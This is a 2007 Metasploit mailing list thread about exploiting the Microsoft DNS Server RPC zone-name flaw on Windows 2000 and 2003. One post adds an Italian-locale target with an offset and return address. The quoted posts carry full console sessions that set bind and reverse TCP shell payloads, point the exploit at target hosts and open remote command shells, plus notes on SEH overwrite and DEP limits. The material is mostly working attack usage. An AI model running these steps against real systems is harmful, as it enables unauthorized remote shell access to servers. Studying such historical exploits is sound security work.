Metasploit mailing list archives
Exploiting the Microsoft DNS RPC service
From: diaul at devilopers.org (diaul)
Date: Wed, 18 Apr 2007 11:05:05 +0200
Hi U can simply add this target: [ 'Windows 2000 Server SP0-SP4+ Italian', { 'Off' => 1213, 'Ret' => 0x74fd2ac4 } ], btw some time ago I sent all windows italian opcodes to skape and now they are available on metasploit opcodes db. Here is msf3 session: <CUT> msf exploit(ms07_019_upnp) > use exploit/windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > show targets Exploit targets: Id Name -- ---- 0 Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English 1 Windows 2000 Server SP0-SP4+ English 2 Windows 2000 Server SP0-SP4+ Italian 3 Windows 2003 Server SP0 English 4 Windows 2003 Server SP1-SP2 English msf exploit(msdns_zonename) > set TARGET 2 TARGET => 2 msf exploit(msdns_zonename) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(msdns_zonename) > set RHOST 10.4.14.47 RHOST => 10.4.14.47 msf exploit(msdns_zonename) > exploit [*] Started bind handler [*] Connecting to the endpoint mapper service... [*] Discovered Microsoft DNS Server RPC service on port 1029 [*] Trying target Windows 2000 Server SP0-SP4+ Italian... [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ... [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:10.4.14.47[0] ... [*] Sending exploit... [*] Error: no response from dcerpc service [*] Command shell session 1 opened (192.168.1.80:49647 -> 10.4.14.47:4444) Microsoft Windows 2000 [Versione 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> </CUT> Ciao :) diaul Giorgio Casali wrote:
Hi, is it possible to have it for the Italian version? Thanks 2007/4/16, H D Moore <hdm at metasploit.com <mailto:hdm at metasploit.com>>: The exploit module has been merged to stable, use 'Online Update' or 'svn update' to grab it. The module's default target will exploit Windows 2000 SP0-SP4 and Windows 2003 SP0-SP2. All targets are designed for the English locale. If you have a non-English system, submit targets. The Windows 2003 SP0 target may not be reliable. The Windows 2003 SP1-SP2 targets will only work if hardware DEP is not in use. We use the SEH overwrite method for all targets and the /GS stack prevention means we will not be able to use standard hardware DEP bypass techniques (return to NTDLL to disable NX). The RPORT option defaults to '0' and will contact the endpoint mapper of the target system in order to determine the real RPC port at runtime. This saves a step, but it does mean that one of port 135 or 593 needs to be accessible on the target. If you are attacking a system with only ports > 1025 allowed through the firewall, you will need to locate the RPC service and set RPORT manually. To use the module, open the console interface, and run: msf> use exploit/windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > msf exploit(msdns_zonename) > set PAYLOAD <your favorite payload> msf exploit(msdns_zonename) > set <payload options> msf exploit(msdns_zonename) > set RHOST <target> msf exploit(msdns_zonename) > exploit -- example -- < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ msf v3.0 + -- --=[ 184 exploits - 104 payloads + -- --=[ 17 encoders - 5 nops =[ 33 aux msf > use exploit/windows/dcerpc/msdns_zonename msf exploit(msdns_zonename) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(msdns_zonename) > set LHOST 192.168.0.127 <http://192.168.0.127> LHOST => 192.168.0.127 <http://192.168.0.127> msf exploit(msdns_zonename) > set LPORT 4444 LPORT => 4444 msf exploit(msdns_zonename) > set RHOST 172.16.233.128 <http://172.16.233.128> RHOST => 172.16.233.128 <http://172.16.233.128> msf exploit(msdns_zonename) > exploit [*] Started reverse handler [*] Connecting to the endpoint mapper service... [*] Discovered Microsoft DNS Server RPC service on port 1356 [*] Trying target Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English... [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 172.16.233.128 <http://172.16.233.128> [0] ... [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:172.16.233.128 <http://172.16.233.128> [0] ... [*] Sending exploit... [*] Error: no response from dcerpc service [*] Command shell session 1 opened (192.168.0.127:4444 <http://192.168.0.127:4444> -> 192.168.0.127:45196 <http://192.168.0.127:45196>) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. c:\>
-------------- next part -------------- A non-text attachment was scrubbed... Name: msdns_zonename.rb Type: application/x-ruby Size: 4763 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070418/5b9cf130/attachment.rb>
Current thread:
- Exploiting the Microsoft DNS RPC service H D Moore (Apr 15)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Fabrice MOURRON (Apr 18)
- Exploiting the Microsoft DNS RPC service fab at revhosts.net (Apr 19)
- Exploiting the Microsoft DNS RPC service Fabien Perigaud (Apr 19)
- Exploiting the Microsoft DNS RPC service diaul (Apr 18)
- Exploiting the Microsoft DNS RPC service Giorgio Casali (Apr 17)